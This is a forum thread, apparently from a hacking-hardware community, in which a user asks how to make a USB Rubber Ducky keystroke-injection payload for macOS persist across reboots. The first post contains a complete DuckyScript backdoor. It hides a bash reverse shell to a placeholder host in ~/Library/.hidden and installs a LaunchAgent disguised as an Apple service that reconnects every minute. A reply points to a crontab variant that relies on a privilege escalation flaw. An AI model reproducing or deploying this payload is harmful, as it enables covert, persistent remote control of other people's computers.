Net_Spy Posted September 1, 2015 Posted September 1, 2015 (edited) Greetings, I'm looking for a payload for rubber ducky to execute on mac os and give persistance connection even after a restart of target. I've found below script that only can intiate reverse connection once. Can any one help me out to make it persistance to run reverse connection paylopad after each reboot or when machine come back on line after shutdown. Here is the script made by Patrick REM Patrick Mosca REM A simple script for creating a persistent backdoor on OSX. REM Change mysite.com to your domain name or IP address REM Change 1337 to your port number REM Catch the shell with 'nc -l -p 1337' REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/ DELAY 1000 GUI SPACE STRING terminal DELAY 500 ENTER DELAY 500 STRING mkdir ~/Library/.hidden ENTER DELAY 200 STRING echo '#!/bin/bash ENTER STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1 ENTER STRING wait' > ~/Library/.hidden/connect.sh ENTER DELAY 500 STRING chmod +x ~/Library/.hidden/connect.sh ENTER DELAY 200 STRING mkdir ~/Library/LaunchAgents ENTER DELAY 200 STRING echo '<plist version="1.0"> ENTER STRING <dict> ENTER STRING <key>Label</key> ENTER STRING <string>com.apples.services</string> ENTER STRING <key>ProgramArguments</key> ENTER STRING <array> ENTER STRING <string>/bin/sh</string> ENTER STRING <string>'$HOME'/Library/.hidden/connect.sh</string> ENTER STRING </array> ENTER STRING <key>RunAtLoad</key> ENTER STRING <true/> ENTER STRING <key>StartInterval</key> ENTER STRING <integer>60</integer> ENTER STRING <key>AbandonProcessGroup</key> ENTER STRING <true/> ENTER STRING </dict> ENTER STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist ENTER DELAY 200 GUI q Edited September 1, 2015 by Net_Spy Quote
V3sth4cks153 Posted September 6, 2015 Posted September 6, 2015 (edited) Hi. I think that's what you're looking for: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/ This payload uses crontab, but it works just as good ! The only problem is that it relies on a privilege escalation vulnerability in OSX Yosemite, which has been patched in OS X 10.10.5, and as far as I'm aware, it's only been tested on Yosemite. I hope this solves your issue ! V3sth4cks153 Edited September 6, 2015 by V3sth4cks153 Quote
Net_Spy Posted October 19, 2015 Author Posted October 19, 2015 @V3sth4cks153 Do I need to make usb firmware as twin compose for that or not?? Regards Net_Spy Quote
V3sth4cks153 Posted October 19, 2015 Posted October 19, 2015 @V3sth4cks153 Do I need to make usb firmware as twin compose for that or not?? Regards Net_Spy Hi, No, you don't need to: the script will work on the stock firmware, as it is fully self contained. Regards, V3sth4cks153 Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.